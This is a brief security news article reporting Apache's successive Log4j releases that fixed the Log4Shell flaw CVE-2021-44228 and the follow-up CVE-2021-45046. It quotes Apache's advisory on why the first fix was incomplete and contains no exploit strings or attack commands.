As affected organizations and vendors continue to identify products affected by Log4Shell remote code execution (RCE) Log4j vulnerability, Apache has released additional Log4j security updates to fix another RCE vulnerability (CVE-2021-45046).
Researchers first discovered the Critical Apache Log4j vulnerability (CVE-2021-44228) that could allow an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
As a result, the severe issue soon triggered the mad scramble by organizations to quickly patch the severe flaw and put up other blocking mitigations such as web application firewall (WAF) policies.
In addition, CISA, Microsoft, Palo Alto Networks and many other vendors issued new guidance for log4j vulnerability remediation.
As a result, Apache released on December 10, 2021 Log4j 2.15.0 for Java 8 users to address CVE-2021-44228 that affected all Log4j versions from 2.0-beta9 to 2.14.1.
On December 13, 2021, Apache then released Log4j 2.12.2 for Java 7 users and Log4j 2.16.0 for Java 8 users to address another Log4j RCE vulnerability CVE-2021-45046.
“It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments,” Apache wrote in the updated security advisory regarding the CVE-2021-45046.